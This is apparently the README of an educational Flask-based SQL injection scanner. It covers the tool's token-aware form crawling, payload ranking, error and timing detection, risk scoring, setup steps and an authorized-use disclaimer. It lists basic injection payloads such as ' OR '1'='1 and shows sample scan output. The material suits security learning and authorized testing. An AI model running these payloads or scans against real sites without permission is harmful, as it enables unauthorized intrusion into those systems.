A token-aware, AI-assisted SQL Injection (SQLi) scanner built with Python and Flask. It crawls web forms, intelligently ranks and injects SQL payloads, analyzes server responses for vulnerability indicators, and presents results through a clean web dashboard with AI-generated security conclusions.
- Token-Aware Form Submission — Automatically refreshes CSRF tokens and hidden fields before each injection attempt
- AI Payload Ranking — Scores and prioritizes payloads before testing (OR, UNION, quote-based)
- SQL Error Detection — Checks responses for known database error signatures (MySQL, PostgreSQL, SQLite, Oracle, MSSQL, ODBC)
- Time-Based Detection — Flags responses slower than 5 seconds as potential blind/time-based SQLi indicators
- Risk Scoring System — Calculates a numeric risk score (0–100) and maps it to HIGH / MEDIUM / LOW levels
- AI Security Analysis — Generates a dynamic human-readable conclusion per scan using real scan data
- Web Dashboard — Flask-based UI to run scans, view history, filter reports, and download JSON results
- Report Storage — Saves every scan as a numbered JSON file in the
reports/folder - Multi-Scan Support — CLI scanner with AI ranking and report saving
- XSS-Safe Dashboard — All user-facing output is escaped to prevent reflected XSS in the UI
Token-Aware-Mini-SQLi-Scanner/
│
├── app.py # Flask web dashboard (main entry point)
├── requirements.txt # Python dependencies
├── pyproject.toml # Project metadata and pytest config
│
├── sqli_scanner/ # Core scanner package
│ ├── __init__.py
│ ├── crawler.py # Finds and parses HTML forms
│ ├── scanner.py # Submits forms with payloads (token-aware)
│ ├── detector.py # Detects SQL errors and computes risk scores
│ ├── timing_detector.py # Flags abnormally slow responses
│ ├── token_extractor.py # Extracts hidden/CSRF token values
│ ├── ai_engine.py # Ranks payloads; generates AI verdict
│ ├── payloads.py # Loads payloads from payloads.json
│ ├── payloads.json # SQL injection payload list
│ ├── report.py # Saves scan results as JSON files
│ └── web_scanner.py # Scan orchestrator
│
├── scripts/ # Command-line entry points
│ ├── mini_scan.py # Lightweight CLI (no AI, no report saving)
│ ├── multi_scan.py # Full CLI with AI ranking and reports
│ └── live_token_test.py # Live token extraction test
│
├── lab/
│ └── server.py # Local vulnerable test server (port 5001)
│
├── tests/ # Automated tests
│ ├── fixtures/ # Sample HTML for unit tests
│ ├── test_ai.py
│ ├── test_detector.py
│ └── test_token.py
│
└── reports/ # Auto-generated scan JSON files
└── scan_1.json, scan_2.json ...
User enters URL
│
▼
crawler.py → Finds all <form> tags on the page
│
▼
token_extractor.py → Extracts fresh CSRF / hidden token values
│
▼
ai_engine.py → Ranks payloads by SQLi relevance score
│
▼
scanner.py → Submits each payload into every form field
│
▼
detector.py → Checks response for SQL errors + slow timing
timing_detector.py
│
▼
ai_engine.py → Generates human-readable AI verdict
│
▼
report.py → Saves result to reports/scan_N.json
│
▼
app.py → Displays result on the web dashboard
Requirements: Python 3.8+
# 1. Clone or extract the project
cd Token-Aware-Mini-SQLi-Scanner
# 2. Create and activate a virtual environment
python -m venv venv
venv\Scripts\activate # Windows
# source venv/bin/activate # macOS / Linux
# 3. Install dependencies
pip install -r requirements.txtpython app.pyOpen your browser at http://127.0.0.1:5000
From the dashboard you can:
- Enter a URL and start a scan
- View the latest scan result with AI Security Analysis
- Filter scan history by URL or risk level (HIGH / MEDIUM / LOW)
- Download the latest report as JSON
- Click any report file to view its full details
python lab/server.pyOpen http://127.0.0.1:5001 and scan those pages with the main scanner.
python scripts/mini_scan.pypython scripts/multi_scan.pypytest| Score Range | Risk Level | Meaning |
|---|---|---|
| 70 – 100 | HIGH | SQL error detected in response |
| 30 – 69 | MEDIUM | Suspicious response timing (possible blind SQLi) |
| 0 – 29 | LOW | No indicators found |
The scanner found 5 form(s) and tested 20 payload(s).
Payload ' OR 1=1 -- generated a suspicious response.
Risk Score reached 35, indicating a potentially exploitable
SQL Injection weakness. Immediate manual testing is strongly recommended.
[
"'",
"\"",
"' OR '1'='1",
"\" OR \"1\"=\"1",
"admin",
"test"
]You can add more payloads directly to sqli_scanner/payloads.json. They are automatically ranked before each scan.
{
"url": "http://example.com/login",
"scan_time": "2026-06-12 19:29:00.123456",
"ai_enabled": true,
"forms_found": 2,
"payloads_tested": 12,
"best_payload": "' OR '1'='1",
"risk_score": 70,
"risk_level": "HIGH",
"ai_summary": "[HIGH] Risk score 70. Most effective payload: ' OR '1'='1. A likely SQL Injection weakness was found. Manual verification is strongly advised."
}This tool is built for authorized security testing and educational purposes only.
Do not scan any website or application without explicit permission from the owner.
Unauthorized scanning may be illegal under computer misuse laws in your country.
| Layer | Technology |
|---|---|
| Backend | Python 3, Flask |
| HTML Parsing | BeautifulSoup4 |
| HTTP Requests | Requests |
| Output Escaping | MarkupSafe |
| Data Storage | JSON files |
| Frontend | Plain HTML + CSS (served by Flask) |
Manu — TokenAwareSQLiScanner
Built as a project for learning web application security concepts.